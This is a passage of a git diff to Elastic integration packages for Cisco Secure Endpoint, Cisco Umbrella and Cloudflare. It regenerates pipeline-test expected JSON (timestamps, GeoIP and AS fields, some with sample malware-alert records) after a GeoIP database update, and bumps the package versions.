@@ -3733,7 +3733,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389158400Z", + "ingested": "2021-12-14T14:41:01.444878764Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -3813,7 +3813,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.389163900Z", + "ingested": "2021-12-14T14:41:01.444879233Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -3889,7 +3889,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.389168400Z", + "ingested": "2021-12-14T14:41:01.444879620Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "553648155", "kind": "alert", 
@@ -3967,7 +3967,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.389171700Z", + "ingested": "2021-12-14T14:41:01.444880105Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "553648147", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/manifest.yml b/packages/cisco_secure_endpoint/manifest.yml index 6d67c67a9d9..f7142c4a834 100644 --- a/packages/cisco_secure_endpoint/manifest.yml +++ b/packages/cisco_secure_endpoint/manifest.yml 
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_secure_endpoint
 title: Cisco Secure Endpoint (AMP)
-version: 0.2.1
+version: 0.2.2
 license: basic
 description: Collect logs from Cisco Secure Endpoint (AMP) with Elastic Agent.
 type: integration
diff --git a/packages/cisco_umbrella/changelog.yml b/packages/cisco_umbrella/changelog.yml
index 42403e4c385..69fafc6722a 100644
--- a/packages/cisco_umbrella/changelog.yml
+++ b/packages/cisco_umbrella/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.3.2"
+ changes:
+ - description: Regenerate test files using the new GeoIP database
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2339
 - version: "0.3.1"
 changes:
 - description: Change test public IPs to the supported subset
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json
index cbdc4dc63e4..47d1aa5f137 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json
@@ -2,6 +2,18 @@
 "expected": [
 {
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "address": "67.43.156.12",
 "ip": "67.43.156.12"
 },
@@ -36,7 +48,7 @@
 ]
 },
 "event": {
- "ingested": "2021-12-09T13:36:00.078901200Z",
+ "ingested": "2021-12-14T14:41:06.773947594Z",
 "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,OUTBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,ALLOW",
 "category": "network",
 "type": [
@@ -56,6 +68,18 @@ }, { "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.12", "ip": "67.43.156.12" }, @@ -90,7 +114,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:00.078910500Z", + "ingested": "2021-12-14T14:41:06.773950384Z", "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,INBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,BLOCK", "category": "network", "type": [ diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json index 34b09248e46..b5bc283c3ba 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json @@ -12,20 +12,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", 
@@ -58,7 +52,7 @@ }, "event": { "action": "dns-request-Allowed", - "ingested": "2021-12-09T13:36:00.307612100Z", + "ingested": "2021-12-14T14:41:07.042646644Z", "original": "\"2020-07-23 23:49:54\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"81.2.69.144\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Software/Technology,Business Services,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"\"", "category": "network", "type": [ @@ -92,6 +86,18 @@ "response_code": "NOERROR" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.12", "ip": "67.43.156.12" }, @@ -122,7 +128,7 @@ }, "event": { "action": "dns-request-Blocked", - "ingested": "2021-12-09T13:36:00.307621100Z", + "ingested": "2021-12-14T14:41:07.042649340Z", "original": "\"2020-07-23 23:50:25\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"67.43.156.12\",\"Blocked\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Chat,Instant Messaging,Block List,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"BlockedCategories\"", "category": "network", "type": [ 
@@ -158,26 +164,32 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "ip": "81.2.69.144" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.12", "ip": "67.43.156.12" }, @@ -207,7 +219,7 @@ }, "event": { "action": "dns-request-Allowed", - "ingested": "2021-12-09T13:36:00.307627300Z", + "ingested": "2021-12-14T14:41:07.042649780Z", "original": "\"2021-05-14 19:39:58\",\"elastic_machine\",\"elastic_machine,Elastic User (ElasticUser@elastic.co)\",\"67.43.156.12\",\"81.2.69.144\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Infrastructure\",\"Roaming Computers\",\"Roaming Computers,AD Users\",\"\"", "category": "network", "type": [ diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json index 41f801dd7e7..cdbf6e9aabf 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json 
@@ -1,23 +1,32 @@ { "expected": [ { + "observer": { + "type": "firewall", + "product": "Umbrella", + "vendor": "Cisco" + }, + "@timestamp": "2020-08-26T20:32:46.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.1.1", + "81.2.69.144" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -29,15 +38,30 @@ "address": "192.168.1.1", "ip": "192.168.1.1" }, + "event": { + "category": "network", + "ingested": "2021-12-14T14:41:08.374045169Z", + "original": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"81.2.69.144\",\"0\",\"Test Category\"" + }, + "cisco": { + "umbrella": { + "categories": "Test Category" + } + }, + "user": { + "name": "elasticuser" + }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "Umbrella", "vendor": "Cisco" }, - "@timestamp": "2020-08-26T20:32:46.000Z", + "@timestamp": "2020-08-26T20:32:45.000Z", "ecs": { "version": "1.12.0" }, 
@@ -47,38 +71,17 @@ "81.2.69.144" ] }, - "event": { - "category": "network", - "ingested": "2021-12-09T13:36:00.633448800Z", - "original": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"81.2.69.144\",\"0\",\"Test Category\"" - }, - "cisco": { - "umbrella": { - "categories": "Test Category" - } - }, - "user": { - "name": "elasticuser" - } - }, - { "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -90,27 +93,9 @@ "address": "192.168.1.1", "ip": "192.168.1.1" }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "type": "firewall", - "product": "Umbrella", - "vendor": "Cisco" - }, - "@timestamp": "2020-08-26T20:32:45.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.1.1", - "81.2.69.144" - ] - }, "event": { "category": "network", - "ingested": "2021-12-09T13:36:00.633453600Z", + "ingested": "2021-12-14T14:41:08.374049248Z", "original": "\"2020-08-26 20:32:45\",\"elasticuser\",\"192.168.1.1\",\"61095\",\"81.2.69.144\",\"445\",\"Test Category\"" }, "cisco": { @@ -120,7 +105,10 @@ }, "user": { "name": "elasticuser" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json index 0cfea734175..cbac8ff7c6b 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json 
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json @@ -4,20 +4,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -69,7 +63,7 @@ } }, "event": { - "ingested": "2021-12-09T13:36:00.832430Z", + "ingested": "2021-12-14T14:41:08.650910742Z", "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"67.43.156.12\",\"81.2.69.144\",\"\",\"ALLOWED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", "category": "network", "type": [ @@ -104,20 +98,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", 
@@ -169,7 +157,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:36:00.832441Z",
+ "ingested": "2021-12-14T14:41:08.650913272Z",
 "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"67.43.156.12\",\"81.2.69.144\",\"\",\"BLOCKED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"",
 "category": "network",
 "type": [
@@ -248,7 +236,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:36:00.832447300Z",
+ "ingested": "2021-12-14T14:41:08.650913743Z",
 "original": "\"2017-10-02 23:52:53\",\"elasticuser\",\"ActiveDirectoryUserName,ADSite,Network\",\"192.168.192.135\",\"67.43.156.12\",\"\",\"\",\"ALLOWED\",\"http://google.com/the.js\",\"www.google.com\",\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\",\"200\",\"562\",\"1489\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"Networks\"",
 "category": "network",
 "type": [
diff --git a/packages/cisco_umbrella/manifest.yml b/packages/cisco_umbrella/manifest.yml
index 4111e9894d2..1acfe82bf85 100644
--- a/packages/cisco_umbrella/manifest.yml
+++ b/packages/cisco_umbrella/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_umbrella
 title: Cisco Umbrella
-version: 0.3.1
+version: 0.3.2
 license: basic
 description: Collect logs from Cisco Umbrella with Elastic Agent.
 type: integration
diff --git a/packages/cloudflare/changelog.yml b/packages/cloudflare/changelog.yml
index 4d2a65f0055..ebae6fba1b9 100644
--- a/packages/cloudflare/changelog.yml
+++ b/packages/cloudflare/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.1"
+ changes:
+ - description: Regenerate test files using the new GeoIP database
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2339
 - version: "1.2.0"
 changes:
 - description: Add audit logs
diff --git a/packages/cloudflare/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/cloudflare/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json
index 81b2b8aace5..e645faa0195 100644
--- a/packages/cloudflare/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json
+++ b/packages/cloudflare/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json
@@ -19,14 +19,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -38,6 +38,20 @@
 "address": "89.160.20.156",
 "ip": "89.160.20.156"
 },
+ "event": {
+ "ingested": "2021-12-14T14:41:11.389077270Z",
+ "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"73fd39ed-5aab-4a2a-b93c-c9a4abf0c425\",\"interface\":\"\",\"metadata\":{\"token_name\":\"test\",\"token_tag\":\"b7261c49a793a82678d12285f0bc1401\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T20:19:48Z\"}",
+ "kind": "event",
+ "action": "token_create",
+ "id": "73fd39ed-5aab-4a2a-b93c-c9a4abf0c425",
+ "type": [
+ "creation"
+ ],
+ "category": [
+ "iam"
+ ],
+ "outcome": "success"
+ },
 "cloudflare": {
 "audit": {
 "actor": {
@@ -56,20 +70,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776103990Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"73fd39ed-5aab-4a2a-b93c-c9a4abf0c425\",\"interface\":\"\",\"metadata\":{\"token_name\":\"test\",\"token_tag\":\"b7261c49a793a82678d12285f0bc1401\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T20:19:48Z\"}", - "kind": "event", - "action": "token_create", - "id": "73fd39ed-5aab-4a2a-b93c-c9a4abf0c425", - "type": [ - "creation" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -97,14 +97,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -116,6 +116,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389079363Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_revoke\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"9929d149-1c4e-4524-87b5-bb81e83b5c84\",\"interface\":\"\",\"metadata\":{\"new_token_status\":\"deleted\",\"old_token_status\":\"active\",\"token_name\":\"test\",\"token_tag\":\"70b6abc4efe977131126486cdd1c00c5\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T20:19:27Z\"}", + "kind": "event", + "action": "token_revoke", + "id": "9929d149-1c4e-4524-87b5-bb81e83b5c84", + "type": [ + "deletion" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -136,20 +150,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776109944Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_revoke\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"9929d149-1c4e-4524-87b5-bb81e83b5c84\",\"interface\":\"\",\"metadata\":{\"new_token_status\":\"deleted\",\"old_token_status\":\"active\",\"token_name\":\"test\",\"token_tag\":\"70b6abc4efe977131126486cdd1c00c5\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T20:19:27Z\"}", - "kind": "event", - "action": "token_revoke", - "id": "9929d149-1c4e-4524-87b5-bb81e83b5c84", - "type": [ - "deletion" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" 
@@ -177,14 +177,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -196,6 +196,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389079840Z", + "original": "{\"action\":{\"result\":true,\"type\":\"API_key_view\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"de577d32-d81a-4fe9-95bc-3cff46d9759e\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"user\"},\"when\":\"2021-11-30T20:18:43Z\"}", + "kind": "event", + "action": "api_key_view", + "id": "de577d32-d81a-4fe9-95bc-3cff46d9759e", + "type": [ + "info" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -210,20 +224,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776112844Z", - "original": "{\"action\":{\"result\":true,\"type\":\"API_key_view\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"de577d32-d81a-4fe9-95bc-3cff46d9759e\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"user\"},\"when\":\"2021-11-30T20:18:43Z\"}", - "kind": "event", - "action": "api_key_view", - "id": "de577d32-d81a-4fe9-95bc-3cff46d9759e", - "type": [ - "info" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -251,14 +251,14 @@ "source": { "geo": { "continent_name": "Europe", - 